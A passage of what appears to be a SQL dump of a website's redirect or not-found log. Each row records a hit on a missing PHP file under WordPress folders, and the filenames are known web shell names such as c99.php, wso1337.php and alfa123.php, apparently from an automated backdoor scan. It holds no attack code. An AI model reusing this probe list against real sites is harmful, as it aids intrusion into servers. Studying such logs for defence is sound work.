00:00:00',301),(51754,'http://3s-technologies.com.tr/en/wp-admin/xox.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:57:41','0000-00-00 00:00:00',301),(51755,'http://3s-technologies.com.tr/en/wp-admin/new.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:57:42','0000-00-00 00:00:00',301),(51756,'http://3s-technologies.com.tr/en/wp-admin/wi.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:57:43','0000-00-00 00:00:00',301),(51757,'http://3s-technologies.com.tr/en/wp-admin/mar.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:57:44','0000-00-00 00:00:00',301),(51758,'http://3s-technologies.com.tr/en/wp-admin/root.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:57:45','0000-00-00 00:00:00',301),(51759,'http://3s-technologies.com.tr/en/wp-admin/nee.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:57:46','0000-00-00 00:00:00',301),(51760,'http://3s-technologies.com.tr/en/wp-admin/lol.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:57:47','0000-00-00 00:00:00',301),(51761,'http://3s-technologies.com.tr/en/wp-admin/haxor.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:57:50','0000-00-00 00:00:00',301),(51762,'http://3s-technologies.com.tr/en/wp-admin/foxwsov1.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:57:53','0000-00-00 00:00:00',301),(51763,'http://3s-technologies.com.tr/en/wp-admin/alf.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:57:53','0000-00-00 00:00:00',301),(51764,'http://3s-technologies.com.tr/en/wp-admin/bb.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:57:54','0000-00-00 00:00:00',301),(51765,'http://3s-technologies.com.tr/en/wp-admin/lf.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:57:55','0000-00-00 00:00:00',301),(51766,'http://3s-technologies.com.tr/en/wp-admin/hello.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:57:57','0000-00-00 00:00:00',301),(51767,'http://3s-technologies.com.tr/en/wp-admin/if.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:57:58','0000-00-00 00:00:00',301),(51768,'http://3s-technologies.com.tr/en/wp-admin/kk.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:57:59','0000-00-00 00:00:00',301),(51769,'http://3s-technologies.com.tr/en/wp-admin/mrjn.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:58:00','0000-00-00 00:00:00',301),(51770,'http://3s-technologies.com.tr/en/wp-admin/kn.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:58:01','0000-00-00 00:00:00',301),(51771,'http://3s-technologies.com.tr/en/wp-admin/3301.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:58:01','0000-00-00 00:00:00',301),(51772,'http://3s-technologies.com.tr/en/wp-admin/alex.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:58:02','0000-00-00 00:00:00',301),(51773,'http://3s-technologies.com.tr/en/wp-admin/anone.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:58:04','0000-00-00 00:00:00',301),(51774,'http://3s-technologies.com.tr/en/wp-admin/wp-configer.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:58:05','0000-00-00 00:00:00',301),(51775,'http://3s-technologies.com.tr/en/wp-admin/wp-ad.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:58:06','0000-00-00 00:00:00',301),(51776,'http://3s-technologies.com.tr/en/wp-admin/send.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:58:06','0000-00-00 00:00:00',301),(51777,'http://3s-technologies.com.tr/en/wp-admin/.wp-cache.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:58:07','0000-00-00 00:00:00',301),(51778,'http://3s-technologies.com.tr/en/wp-admin/sendmail.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:58:08','0000-00-00 00:00:00',301),(51779,'http://3s-technologies.com.tr/en/wp-admin/rahma.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:58:09','0000-00-00 00:00:00',301),(51780,'http://3s-technologies.com.tr/en/wp-admin/nasgor.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:58:10','0000-00-00 00:00:00',301),(51781,'http://3s-technologies.com.tr/en/wp-admin/wp-confirm.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:58:11','0000-00-00 00:00:00',301),(51782,'http://3s-technologies.com.tr/en/wp-admin/alfa123.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:58:12','0000-00-00 00:00:00',301),(51783,'http://3s-technologies.com.tr/en/wp-admin/upload.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:58:12','0000-00-00 00:00:00',301),(51784,'http://3s-technologies.com.tr/en/wp-admin/bypass.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:58:13','0000-00-00 00:00:00',301),(51785,'http://3s-technologies.com.tr/en/wp-admin/wp-one.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:58:14','0000-00-00 00:00:00',301),(51786,'http://3s-technologies.com.tr/en/wp-admin/alexus.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:58:15','0000-00-00 00:00:00',301),(51787,'http://3s-technologies.com.tr/en/wp-admin/wso1337.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:58:16','0000-00-00 00:00:00',301),(51788,'http://3s-technologies.com.tr/en/wp-includes/wp-22.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:58:17','0000-00-00 00:00:00',301),(51789,'http://3s-technologies.com.tr/en/wp-includes/1234.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:58:18','0000-00-00 00:00:00',301),(51790,'http://3s-technologies.com.tr/en/wp-includes/asdasd.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:58:19','0000-00-00 00:00:00',301),(51791,'http://3s-technologies.com.tr/en/wp-includes/xleet.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:58:20','0000-00-00 00:00:00',301),(51792,'http://3s-technologies.com.tr/en/wp-includes/0byte.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:58:21','0000-00-00 00:00:00',301),(51793,'http://3s-technologies.com.tr/en/wp-includes/wp-includes/fw.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:58:22','0000-00-00 00:00:00',301),(51794,'http://3s-technologies.com.tr/en/wp-includes/sym.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:58:22','0000-00-00 00:00:00',301),(51795,'http://3s-technologies.com.tr/en/wp-includes/sym403.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:58:23','0000-00-00 00:00:00',301),(51796,'http://3s-technologies.com.tr/en/wp-includes/xl.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:58:24','0000-00-00 00:00:00',301),(51797,'http://3s-technologies.com.tr/en/wp-includes/symlink.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:58:25','0000-00-00 00:00:00',301),(51798,'http://3s-technologies.com.tr/en/wp-includes/403.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:58:27','0000-00-00 00:00:00',301),(51799,'http://3s-technologies.com.tr/en/wp-includes/c99.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:58:29','0000-00-00 00:00:00',301),(51800,'http://3s-technologies.com.tr/en/wp-includes/xxx.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:58:30','0000-00-00 00:00:00',301),(51801,'http://3s-technologies.com.tr/en/wp-includes/ok.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:58:31','0000-00-00 00:00:00',301),(51802,'http://3s-technologies.com.tr/en/wp-includes/0.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:58:32','0000-00-00 00:00:00',301),(51803,'http://3s-technologies.com.tr/en/wp-includes/a.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:58:48','0000-00-00 00:00:00',301),(51804,'http://3s-technologies.com.tr/en/wp-includes/e.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:58:50','0000-00-00 00:00:00',301),(51805,'http://3s-technologies.com.tr/en/wp-includes/r.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:58:51','0000-00-00 00:00:00',301),(51806,'http://3s-technologies.com.tr/en/wp-includes/t.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:58:52','0000-00-00 00:00:00',301),(51807,'http://3s-technologies.com.tr/en/wp-includes/y.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:58:53','0000-00-00 00:00:00',301),(51808,'http://3s-technologies.com.tr/en/wp-includes/u.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:58:54','0000-00-00 00:00:00',301),(51809,'http://3s-technologies.com.tr/en/wp-includes/i.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:58:55','0000-00-00 00:00:00',301),(51810,'http://3s-technologies.com.tr/en/wp-includes/o.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:58:55','0000-00-00 00:00:00',301),(51811,'http://3s-technologies.com.tr/en/wp-includes/p.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:58:57','0000-00-00 00:00:00',301),(51812,'http://3s-technologies.com.tr/en/wp-includes/q.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:58:57','0000-00-00 00:00:00',301),(51813,'http://3s-technologies.com.tr/en/wp-includes/s.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:58:58','0000-00-00 00:00:00',301),(51814,'http://3s-technologies.com.tr/en/wp-includes/d.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:58:59','0000-00-00 00:00:00',301),(51815,'http://3s-technologies.com.tr/en/wp-includes/f.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:59:00','0000-00-00 00:00:00',301),(51816,'http://3s-technologies.com.tr/en/wp-includes/g.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:59:01','0000-00-00 00:00:00',301),(51817,'http://3s-technologies.com.tr/en/wp-includes/h.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:59:02','0000-00-00 00:00:00',301),(51818,'http://3s-technologies.com.tr/en/wp-includes/j.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:59:03','0000-00-00 00:00:00',301),(51819,'http://3s-technologies.com.tr/en/wp-includes/k.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:59:04','0000-00-00 00:00:00',301),(51820,'http://3s-technologies.com.tr/en/wp-includes/l.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:59:04','0000-00-00 00:00:00',301),(51821,'http://3s-technologies.com.tr/en/wp-includes/m.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:59:05','0000-00-00 00:00:00',301),(51822,'http://3s-technologies.com.tr/en/wp-includes/w.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:59:06','0000-00-00 00:00:00',301),(51823,'http://3s-technologies.com.tr/en/wp-includes/v.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:59:07','0000-00-00 00:00:00',301),(51824,'http://3s-technologies.com.tr/en/wp-includes/n.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:59:08','0000-00-00 00:00:00',301),(51825,'http://3s-technologies.com.tr/en/wp-includes/b.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:59:09','0000-00-00 00:00:00',301),(51826,'http://3s-technologies.com.tr/en/wp-includes/c.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:59:10','0000-00-00 00:00:00',301),(51827,'http://3s-technologies.com.tr/en/wp-includes/wp-wso.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:59:11','0000-00-00 00:00:00',301),(51828,'http://3s-technologies.com.tr/en/wp-includes/priv8.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:59:12','0000-00-00 00:00:00',301),(51829,'http://3s-technologies.com.tr/en/wp-includes/minimo.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:59:13','0000-00-00 00:00:00',301),(51830,'http://3s-technologies.com.tr/en/wp-includes/v3.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:59:14','0000-00-00 00:00:00',301),(51831,'http://3s-technologies.com.tr/en/wp-includes/v5.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:59:15','0000-00-00 00:00:00',301),(51832,'http://3s-technologies.com.tr/en/wp-includes/www.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:59:16','0000-00-00 00:00:00',301),(51833,'http://3s-technologies.com.tr/en/wp-includes/100.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:59:17','0000-00-00 00:00:00',301),(51834,'http://3s-technologies.com.tr/en/wp-includes/777.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:59:17','0000-00-00 00:00:00',301),(51835,'http://3s-technologies.com.tr/en/wp-includes/defau1t.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:59:18','0000-00-00 00:00:00',301),(51836,'http://3s-technologies.com.tr/en/wp-includes/xox.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:59:19','0000-00-00 00:00:00',301),(51837,'http://3s-technologies.com.tr/en/wp-includes/new.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:59:20','0000-00-00 00:00:00',301),(51838,'http://3s-technologies.com.tr/en/wp-includes/wi.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:59:21','0000-00-00 00:00:00',301),(51839,'http://3s-technologies.com.tr/en/wp-includes/mar.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:59:22','0000-00-00 00:00:00',301),(51840,'http://3s-technologies.com.tr/en/wp-includes/root.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:59:23','0000-00-00 00:00:00',301),(51841,'http://3s-technologies.com.tr/en/wp-includes/nee.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:59:24','0000-00-00 00:00:00',301),(51842,'http://3s-technologies.com.tr/en/wp-includes/ws.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:59:25','0000-00-00 00:00:00',301),(51843,'http://3s-technologies.com.tr/en/wp-includes/lol.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:59:26','0000-00-00 00:00:00',301),(51844,'http://3s-technologies.com.tr/en/wp-includes/haxor.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:59:29','0000-00-00 00:00:00',301),(51845,'http://3s-technologies.com.tr/en/wp-includes/foxwsov1.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:59:31','0000-00-00 00:00:00',301),(51846,'http://3s-technologies.com.tr/en/wp-includes/alf.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:59:32','0000-00-00 00:00:00',301),(51847,'http://3s-technologies.com.tr/en/wp-includes/bb.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:59:33','0000-00-00 00:00:00',301),(51848,'http://3s-technologies.com.tr/en/wp-includes/hello.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:59:35','0000-00-00 00:00:00',301),(51849,'http://3s-technologies.com.tr/en/wp-includes/if.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:59:36','0000-00-00 00:00:00',301),(51850,'http://3s-technologies.com.tr/en/wp-includes/kk.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:59:36','0000-00-00 00:00:00',301),(51851,'http://3s-technologies.com.tr/en/wp-includes/mrjn.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:59:37','0000-00-00 00:00:00',301),(51852,'http://3s-technologies.com.tr/en/wp-includes/kn.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:59:38','0000-00-00 00:00:00',301),(51853,'http://3s-technologies.com.tr/en/wp-includes/3301.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:59:39','0000-00-00 00:00:00',301),(51854,'http://3s-technologies.com.tr/en/wp-includes/alex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:59:40','0000-00-00 00:00:00',301),(51855,'http://3s-technologies.com.tr/en/wp-includes/mailer.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:59:41','0000-00-00 00:00:00',301),(51856,'http://3s-technologies.com.tr/en/wp-includes/anone.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:59:42','0000-00-00 00:00:00',301),(51857,'http://3s-technologies.com.tr/en/wp-includes/wp-configer.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:59:43','0000-00-00 00:00:00',301),(51858,'http://3s-technologies.com.tr/en/wp-includes/wp-ad.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:59:44','0000-00-00 00:00:00',301),(51859,'http://3s-technologies.com.tr/en/wp-includes/send.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:59:45','0000-00-00 00:00:00',301),(51860,'http://3s-technologies.com.tr/en/wp-includes/.wp-cache.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:59:45','0000-00-00 00:00:00',301),(51861,'http://3s-technologies.com.tr/en/wp-includes/sendmail.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:59:46','0000-00-00 00:00:00',301),(51862,'http://3s-technologies.com.tr/en/wp-includes/rahma.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:59:47','0000-00-00 00:00:00',301),(51863,'http://3s-technologies.com.tr/en/wp-includes/nasgor.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:59:48','0000-00-00 00:00:00',301),(51864,'http://3s-technologies.com.tr/en/wp-includes/wp-confirm.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:59:49','0000-00-00 00:00:00',301),(51865,'http://3s-technologies.com.tr/en/wp-includes/alfa123.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:59:50','0000-00-00 00:00:00',301),(51866,'http://3s-technologies.com.tr/en/wp-includes/upload.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:59:51','0000-00-00 00:00:00',301),(51867,'http://3s-technologies.com.tr/en/wp-includes/bypass.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:59:51','0000-00-00 00:00:00',301),(51868,'http://3s-technologies.com.tr/en/wp-includes/wp-one.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:59:52','0000-00-00 00:00:00',301),(51869,'http://3s-technologies.com.tr/en/wp-includes/alexus.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:59:53','0000-00-00 00:00:00',301),(51870,'http://3s-technologies.com.tr/en/wp-includes/wso1337.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:59:54','0000-00-00 00:00:00',301),(51871,'http://3s-technologies.com.tr/en/wp-content/1234.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:59:55','0000-00-00 00:00:00',301),(51872,'http://3s-technologies.com.tr/en/wp-content/asdasd.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:59:56','0000-00-00 00:00:00',301),(51873,'http://3s-technologies.com.tr/en/wp-content/xleet.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:59:57','0000-00-00 00:00:00',301),(51874,'http://3s-technologies.com.tr/en/wp-content/0byte.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:59:58','0000-00-00 00:00:00',301),(51875,'http://3s-technologies.com.tr/en/wp-content/wp-content/fw.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:59:59','0000-00-00 00:00:00',301),(51876,'http://3s-technologies.com.tr/en/wp-content/sym.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:00:00','0000-00-00 00:00:00',301),(51877,'http://3s-technologies.com.tr/en/wp-content/sym403.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:00:01','0000-00-00 00:00:00',301),(51878,'http://3s-technologies.com.tr/en/wp-content/xl.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:00:01','0000-00-00 00:00:00',301),(51879,'http://3s-technologies.com.tr/en/wp-content/symlink.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:00:02','0000-00-00 00:00:00',301),(51880,'http://3s-technologies.com.tr/en/wp-content/404.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:00:03','0000-00-00 00:00:00',301),(51881,'http://3s-technologies.com.tr/en/wp-content/403.php',NULL,'https://duckduckgo.com/','',8,0,'2025-12-20 05:00:04','0000-00-00 00:00:00',301),(51882,'http://3s-technologies.com.tr/en/wp-content/c99.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:00:06','0000-00-00 00:00:00',301),(51883,'http://3s-technologies.com.tr/en/wp-content/xxx.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:00:07','0000-00-00 00:00:00',301),(51884,'http://3s-technologies.com.tr/en/wp-content/ok.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:00:08','0000-00-00 00:00:00',301),(51885,'http://3s-technologies.com.tr/en/wp-content/0.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:00:08','0000-00-00 00:00:00',301),(51886,'http://3s-technologies.com.tr/en/wp-content/xx.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:00:10','0000-00-00 00:00:00',301),(51887,'http://3s-technologies.com.tr/en/wp-content/a.php',NULL,'https://www.google.co.uk/','',8,0,'2025-12-20 05:00:23','0000-00-00 00:00:00',301),(51888,'http://3s-technologies.com.tr/en/wp-content/z.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:00:24','0000-00-00 00:00:00',301),(51889,'http://3s-technologies.com.tr/en/wp-content/e.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:00:25','0000-00-00 00:00:00',301),(51890,'http://3s-technologies.com.tr/en/wp-content/r.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:00:26','0000-00-00 00:00:00',301),(51891,'http://3s-technologies.com.tr/en/wp-content/t.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:00:27','0000-00-00 00:00:00',301),(51892,'http://3s-technologies.com.tr/en/wp-content/y.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:00:28','0000-00-00 00:00:00',301),(51893,'http://3s-technologies.com.tr/en/wp-content/u.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:00:29','0000-00-00 00:00:00',301),(51894,'http://3s-technologies.com.tr/en/wp-content/i.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:00:30','0000-00-00 00:00:00',301),(51895,'http://3s-technologies.com.tr/en/wp-content/o.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:00:31','0000-00-00 00:00:00',301),(51896,'http://3s-technologies.com.tr/en/wp-content/p.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:00:31','0000-00-00 00:00:00',301),(51897,'http://3s-technologies.com.tr/en/wp-content/q.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:00:32','0000-00-00 00:00:00',301),(51898,'http://3s-technologies.com.tr/en/wp-content/s.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:00:33','0000-00-00 00:00:00',301),(51899,'http://3s-technologies.com.tr/en/wp-content/d.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:00:34','0000-00-00 00:00:00',301),(51900,'http://3s-technologies.com.tr/en/wp-content/f.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:00:35','0000-00-00 00:00:00',301),(51901,'http://3s-technologies.com.tr/en/wp-content/g.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:00:36','0000-00-00 00:00:00',301),(51902,'http://3s-technologies.com.tr/en/wp-content/h.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:00:37','0000-00-00 00:00:00',301),(51903,'http://3s-technologies.com.tr/en/wp-content/j.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:00:37','0000-00-00 00:00:00',301),(51904,'http://3s-technologies.com.tr/en/wp-content/k.php',NULL,'https://www.yahoo.com/','',7,0,'2025-12-20 05:00:38','0000-00-00 00:00:00',301),(51905,'http://3s-technologies.com.tr/en/wp-content/l.php',NULL,'https://www.google.fr/','',10,0,'2025-12-20 05:00:39','0000-00-00 00:00:00',301),(51906,'http://3s-technologies.com.tr/en/wp-content/m.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:00:41','0000-00-00 00:00:00',301),(51907,'http://3s-technologies.com.tr/en/wp-content/w.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:00:42','0000-00-00 00:00:00',301),(51908,'http://3s-technologies.com.tr/en/wp-content/v.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:00:43','0000-00-00 00:00:00',301),(51909,'http://3s-technologies.com.tr/en/wp-content/n.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:00:44','0000-00-00 00:00:00',301),(51910,'http://3s-technologies.com.tr/en/wp-content/b.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:00:44','0000-00-00 00:00:00',301),(51911,'http://3s-technologies.com.tr/en/wp-content/c.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:00:45','0000-00-00 00:00:00',301),(51912,'http://3s-technologies.com.tr/en/wp-content/priv8.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:00:47','0000-00-00 00:00:00',301),(51913,'http://3s-technologies.com.tr/en/wp-content/minimo.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:00:48','0000-00-00 00:00:00',301),(51914,'http://3s-technologies.com.tr/en/wp-content/v3.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:00:49','0000-00-00 00:00:00',301),(51915,'http://3s-technologies.com.tr/en/wp-content/v5.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:00:50','0000-00-00 00:00:00',301),(51916,'http://3s-technologies.com.tr/en/wp-content/www.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:00:51','0000-00-00 00:00:00',301),(51917,'http://3s-technologies.com.tr/en/wp-content/100.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:00:52','0000-00-00 00:00:00',301),(51918,'http://3s-technologies.com.tr/en/wp-content/777.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:00:53','0000-00-00 00:00:00',301),(51919,'http://3s-technologies.com.tr/en/wp-content/defau1t.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:00:54','0000-00-00 00:00:00',301),(51920,'http://3s-technologies.com.tr/en/wp-content/xox.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:00:55','0000-00-00 00:00:00',301),(51921,'http://3s-technologies.com.tr/en/wp-content/new.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:00:56','0000-00-00 00:00:00',301),(51922,'http://3s-technologies.com.tr/en/wp-content/wi.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:00:57','0000-00-00 00:00:00',301),(51923,'http://3s-technologies.com.tr/en/wp-content/mar.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:00:58','0000-00-00 00:00:00',301),(51924,'http://3s-technologies.com.tr/en/wp-content/root.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:00:58','0000-00-00 00:00:00',301),(51925,'http://3s-technologies.com.tr/en/wp-content/nee.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:00:59','0000-00-00 00:00:00',301),(51926,'http://3s-technologies.com.tr/en/wp-content/ws.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:01:00','0000-00-00 00:00:00',301),(51927,'http://3s-technologies.com.tr/en/wp-content/lol.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:01:01','0000-00-00 00:00:00',301),(51928,'http://3s-technologies.com.tr/en/wp-content/haxor.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:01:04','0000-00-00 00:00:00',301),(51929,'http://3s-technologies.com.tr/en/wp-content/foxwsov1.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:01:06','0000-00-00 00:00:00',301),(51930,'http://3s-technologies.com.tr/en/wp-content/alf.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:01:07','0000-00-00 00:00:00',301),(51931,'http://3s-technologies.com.tr/en/wp-content/bb.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:01:08','0000-00-00 00:00:00',301),(51932,'http://3s-technologies.com.tr/en/wp-content/lf.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:01:09','0000-00-00 00:00:00',301),(51933,'http://3s-technologies.com.tr/en/wp-content/hello.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:01:11','0000-00-00 00:00:00',301),(51934,'http://3s-technologies.com.tr/en/wp-content/if.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:01:12','0000-00-00 00:00:00',301),(51935,'http://3s-technologies.com.tr/en/wp-content/kk.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:01:13','0000-00-00 00:00:00',301),(51936,'http://3s-technologies.com.tr/en/wp-content/kn.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:01:15','0000-00-00 00:00:00',301),(51937,'http://3s-technologies.com.tr/en/wp-content/3301.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:01:16','0000-00-00 